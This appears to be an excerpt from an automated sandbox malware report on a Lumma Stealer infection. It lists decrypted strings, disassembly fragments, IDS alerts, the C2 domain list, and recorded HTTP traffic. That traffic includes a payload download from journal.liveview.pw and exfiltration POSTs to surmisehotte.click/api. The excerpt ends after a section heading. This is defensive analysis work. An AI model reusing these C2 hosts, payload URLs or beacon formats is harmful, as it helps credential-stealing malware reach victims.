                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: crosshuaht.lat
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: sustainskelet.lat
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: aspecteirs.lat
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: energyaffai.lat
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: necklacebudi.lat
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: discokeyus.lat
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: grannyejh.lat
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: surmisehotte.click
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: TeslaBrowser/5.5
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: - Screen Resoluton:
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: - Physical Installed Memory:
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: Workgroup: -
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: yJEcaG--singl6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00445799 CryptUnprotectData,8_2_00445799
                Source: unknownHTTPS traffic detected: 104.21.37.173:443 -> 192.168.2.6:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49958 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49964 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49971 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49976 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49982 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49989 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49995 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49996 version: TLS 1.2
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D474CBh4_2_06D473B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D45276h4_2_06D45416
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D474CBh4_2_06D47574
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D45276h4_2_06D45210
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D45276h4_2_06D45201
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D474CBh4_2_06D473A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D44C29h4_2_06D44851
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D44C29h4_2_06D44860
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]8_2_00453860
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al8_2_0045DA53
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_00439580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebp+00h], ax8_2_00439580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]8_2_0046C767
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax8_2_00445799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_00445799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0045984F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_00468810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh8_2_00468810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh8_2_00468810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then test eax, eax8_2_00468810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0044682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]8_2_0044682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]8_2_0044682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], bp8_2_0044D83A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push C0BFD6CCh8_2_00453086
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push C0BFD6CCh8_2_00453086
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]8_2_0045B170
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]8_2_004479C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h8_2_0046B1D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_0046B1D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_004591DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]8_2_004591DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_00435990
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, eax8_2_00435990
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, esi8_2_00452190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], cx8_2_00452190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h8_2_00452190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0045CA49
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]8_2_00446263
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]8_2_00445220
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0045CAD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push esi8_2_00457AD3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], ax8_2_0044B2E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push ebx8_2_0046CA93
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0044CB40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx8_2_0044CB40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00458B61
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0045CB11
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0045CB22
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]8_2_0046F330
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_0043DBD9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_0043DBD9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h8_2_0044D380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]8_2_00447380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp al, 2Eh8_2_00456B95
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]8_2_00447380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00465450
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push 00000000h8_2_00459C2B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_004591DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]8_2_004591DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]8_2_004374F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]8_2_004374F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]8_2_0046ECA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h8_2_004685E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_004685E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]8_2_00447DEE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [0047450Ch]8_2_00448591
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]8_2_00458D93
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then xor edi, edi8_2_0044759F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [0047473Ch]8_2_0044C653
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebp8_2_00455E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [004755F4h]8_2_00455E30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0046AEC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al8_2_00438F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], bl8_2_00438F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_0045A700
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]8_2_0043B70C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al8_2_0044BF14
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]8_2_00449F30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]8_2_0044E7C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, word ptr [edx]8_2_004497C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edi], dx8_2_004497C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx8_2_004497C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, ebx8_2_0045DFE9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx8_2_0043BFFD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]8_2_0046EFB0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49964 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49964 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49958 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49958 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49989 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49996 -> 104.21.64.1:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: surmisehotte.click
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: global trafficHTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49958 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49964 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49971 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49976 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49982 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49995 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49996 -> 104.21.64.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: surmisehotte.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=70P8X59W1L48VXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: surmisehotte.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8R69TJHIZZJ6HDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15088Host: surmisehotte.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PK2RLULDFG4MCMDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19952Host: surmisehotte.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G3GD1W4EGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1172Host: surmisehotte.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N7DVGC5TCZBQPB6BIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569242Host: surmisehotte.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: surmisehotte.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: journal.liveview.pw
                Source: global trafficDNS traffic detected: DNS query: surmisehotte.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click
                Source: powershell.exe, 00000002.00000002.2253229810.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2250678639.0000000004851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2249066448.00000000007DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 00000002.00000002.2250678639.0000000004851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.adm
                Source: powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: powershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://journal.liveview.pw
                Source: powershell.exe, 00000004.00000002.3261007715.0000000000A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://journal.liveview.pw/singl6.vsdx
                Source: powershell.exe, 00000002.00000002.2253229810.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000008.00000002.3477065714.0000000004B27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3475273003.0000000000756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/
                Source: powershell.exe, 00000008.00000002.3470317954.00000000006EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/=
                Source: powershell.exe, 00000008.00000002.3475273003.0000000000756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/api
                Source: powershell.exe, 00000008.00000002.3470317954.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/apiC
                Source: powershell.exe, 00000008.00000002.3475273003.0000000000756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surmisehotte.click/tc
                Source: powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownHTTPS traffic detected: 104.21.37.173:443 -> 192.168.2.6:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49958 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49964 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49971 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49976 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49982 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49989 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49995 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49996 version: TLS 1.2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004629C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_004629C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004629C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_004629C0

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
